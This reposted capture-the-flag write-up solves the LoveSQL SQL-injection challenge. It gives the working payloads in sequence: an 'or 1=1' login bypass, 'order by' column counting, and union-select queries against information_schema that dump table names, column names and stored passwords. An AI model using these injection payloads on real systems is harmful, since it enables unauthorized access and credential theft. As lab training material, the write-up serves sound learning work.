sql注入 [极客大挑战 2019]LoveSQL 1

sql注入 [极客大挑战 2019]LoveSQL 1

news/2024/11/27 22:38:33/文章来源:https://blog.csdn.net/m0_75178803/article/details/134471201

打开题目

几次尝试，发现输1 1"，页面都会回显NO,Wrong username password！！！

只有输入1'，页面报错，说明是单引号的字符型注入

那我们万能密码试试能不能登录

1' or 1=1 #

成功登录

得到账号和密码

我们登录一下发现什么也没有

爆破列名字段数

1' order by 4 # 页面报错

但是1' order by 3 #时

页面没有报错，说明列名字段数为3

爆破数据显示位

1' union select 1,2,3 #

可以得到数据显示位为2和3

接着我们爆破数据库名

1' union select 1,2,database() #

得到数据库名为geek

爆破表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

当前数据库下的所有表名有

爆破列名

在这里我们先试试l0ve1ysq1表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

得到其表下有三个字段

我们直接爆破password字段试试下面有没有flag

1' union select 1,2,group_concat(password) from l0ve1ysq1 #

得到数据

直接查看源代码得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/147090.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

系列六、JVM的内存结构【栈】

系列六、JVM的内存结构【栈】

一、产生背景由于跨平台性的设计，Java的指令都是根据栈来设计的，不同平台的CPU架构不同，所以不能设计为基于寄存器的。二、概述栈也叫栈内存，主管Java程序的运行，是在线程创建时创建，线程销毁时销毁&…

阅读更多...

从0开始学习JavaScript--JavaScript 循环与迭代详解

从0开始学习JavaScript--JavaScript 循环与迭代详解

JavaScript中的循环和迭代是编写高效和灵活代码的关键。循环用于重复执行一段代码，而迭代则用于遍历数据结构。本文将深入研究JavaScript中常见的循环结构和迭代方法，并通过丰富的示例代码来帮助读者更好地理解和运用这些概念。基本的for循环 for循环…

阅读更多...

el-table固定表头（设置height）出现内容过多时不能滚动问题

el-table固定表头（设置height）出现内容过多时不能滚动问题

主要原因是el-table没有div包裹解决：加一个div并设置其高度和overflow 我自己的主要代码 <div class"contentTable"><el-tableref"table":data"tableData"striperow-dblclick"onRowDblclick"height"100%&q…

阅读更多...

B031-网络编程 Socket Http TomCat

B031-网络编程 Socket Http TomCat

目录计算机网络网络编程相关术语IP地址ip的概念InerAdress的了解与测试端口URLTCP、UDP和7层架构TCPUDPTCP与UDP的区别和联系TCP的3次握手七层架构 Socket编程服务端代码客户端代码 http协议概念Http报文 Tomcat模拟计算机网络见文档网络编程相关术语见文档 IP地址 …

阅读更多...

3.3 Windows驱动开发：内核MDL读写进程内存

3.3 Windows驱动开发：内核MDL读写进程内存

MDL内存读写是一种通过创建MDL结构体来实现跨进程内存读写的方式。在Windows操作系统中，每个进程都有自己独立的虚拟地址空间，不同进程之间的内存空间是隔离的。因此，要在一个进程中读取或写入另一个进程的内存数据，需要先将目标进…

阅读更多...

unity教程

unity教程

前言伴随游戏行业的兴起，unity引擎的使用越来越普遍，本文章主要记录博主本人入门unity的相关记录大部分依赖siki学院进行整理。12 一、认识unity引擎？ 1、Unity相关信息： Unity的诞生：https://www.jianshu.com/p/550…

阅读更多...

Springboot更新用户头像

Springboot更新用户头像

人们通常(为徒省事)把一个包含了修改后userName的完整userInfo对象传给后端，做完整更新。但仔细想想，这种做法感觉有点二，而且浪费带宽。于是patch诞生，只传一个userName到指定资源去，表示该请求是一个局部更新&#…

阅读更多...

Filter和ThreadLocal结合存储用户id信息

Filter和ThreadLocal结合存储用户id信息

ThreadLocal并不是一个Thread，而是Thread的局部变量。当使用ThreadLocal维护变量时，ThreadLocal为每个使用该变量的线程提供独立的变量副本，所以每一个线程都可以独立地改变自己的副本，而不会影响其它线程所对应的副本。ThreadLoc…

阅读更多...

十一、统一网关GateWay（搭建网关、过滤器、跨越解决）

十一、统一网关GateWay（搭建网关、过滤器、跨越解决）

目录一、网关技术的实现在SpringCloud中网关的实现包括两种: 作用： 二、搭建网关服务 1、新建模块，并添加依赖 2、新建Gateway包，并编写启动类 3、编写yml文件 4、启动服务，并在网页内测试 5、步骤三、路由断言工厂 …

阅读更多...

android PopupWindow设置

android PopupWindow设置

记录一个小功能，使用场景，列表项点击弹出如图： java类代码： public class PopupUtil extends PopupWindow {private Activity context;private View view;private ListView listView;private TextView m_tv_reminderm, m_tv_Wa…

阅读更多...

专注于绘画，不受限制！尝试Growly Draw for Mac的快速绘画应用

专注于绘画，不受限制！尝试Growly Draw for Mac的快速绘画应用

Growly Draw Mac版是Mac平台上的一款绘画应用，它提供了简单易用的画板页面和多种色彩、画笔工具，让你可以轻松地完成作画。无论你是初学者还是专业人士，都可以在这款应用中找到适合自己的绘画方式。通过使用Growly Draw Mac版，你可…

阅读更多...

高防IP是什么？如何隐藏源站IP？如何进行防护？

高防IP是什么？如何隐藏源站IP？如何进行防护？

高防IP是针对互联网服务器遭受大流量的DDoS攻击后导致服务不可用的情况下,推出的付费增值服务。用户在数据不转移的情况下,就可以通过配置高防IP , 将攻击流量引流到高防|P,确保源站的稳定可靠。高防IP采用的技术手段包括DDoS防护、WAF ( Web应用程序防火墙)等,它能够有效抵御来…

阅读更多...

$机器学习第7天：逻辑回归$

机器学习第7天：逻辑回归

文章目录介绍概率计算逻辑回归的损失函数单个实例的成本函数整个训练集的成本函数鸢尾花数据集上的逻辑回归 Softmax回归 Softmax回归数学公式 Softmax回归损失函数调用代码参数说明结语介绍作用：使用回归算法进行分类任务思想：…

阅读更多...

Lstm+transformer的刀具磨损预测

Lstm+transformer的刀具磨损预测

视频讲解：基于Lstm+transformer的刀具磨损预测实战_哔哩哔哩_bilibili 结果展示：数据展示：主要代码： # pip install openpyxl -i https://pypi.tuna.tsinghua.edu.cn/simple/ # pip install optuna -i https://pypi.tuna.tsinghua.edu.cn/simple/ import numpy as np…

阅读更多...

深信服AC应用控制技术

深信服AC应用控制技术

拓扑图目录拓扑图一.上班时间不允许使用qq(假设上班时间是上午9到12，下午14到18) 1.新增上班时间不允许使用qq访问权限策略 2.将策略应用到组，例如修仙部 3.验证上班时间发现登录不了下班时间可以登录二.上班时间不允许访问视频网站(假设上班时…

阅读更多...

SQLite3 数据库学习（一）：数据库和 SQLite 基础

SQLite3 数据库学习（一）：数据库和 SQLite 基础

参考引用 SQL 必知必会SQLite 权威指南（第二版）关系型数据库概述 1. 数据库基础 1.1 什么是数据库数据库（database）：保存有组织的数据的容器（通常是一个文件或一组文件） 可以将其想象为一个文…

阅读更多...

idea查看UML类图

idea查看UML类图

idea查看UML类图一、如何查看UML类图 1.1 选择需要查看的类或者包，鼠标右键，选择Diagrams->Show Diagram 1.2 对于UML类图中的包，选中后点击鼠标右键-> Expand Nodes(展开节点) 展开前展开后 1.3 展开后分布比较凌乱&#xff…

阅读更多...

带你快速掌握Linux最常用的命令（图文详解）- 最新版（面试笔试常考）

带你快速掌握Linux最常用的命令（图文详解）- 最新版（面试笔试常考）

最常用的Linux指令（图文详解）- 最新版 ls：列出目录中的文件和子目录。（重点）cd：改变当前工作目录。绝对路径：相对路径 pwd：显示当前工作目录的路径。mkdir：创建一个新的目…

阅读更多...

教你轻松解决win系统ucrtbased.dll丢失的问题，亲测有效！

教你轻松解决win系统ucrtbased.dll丢失的问题，亲测有效！

ucrtbased.dll是一个动态链接库文件（DLL），它是Windows操作系统中的一部分，主要负责提供操作系统和应用程序所需的函数和接口。这个文件包含了操作系统和应用程序共同使用的通用代码，以确保不同程序之间的兼容性和稳定性…

阅读更多...

6.2 List和Set接口

6.2 List和Set接口

1. List接口 List接口继承自Collection接口，List接口实例中允许存储重复的元素，所有的元素以线性方式进行存储。在程序中可以通过索引访问List接口实例中存储的元素。另外，List接口实例中存储的元素是有序的，即元素的存入顺序和取…

阅读更多...

推荐文章

最新文章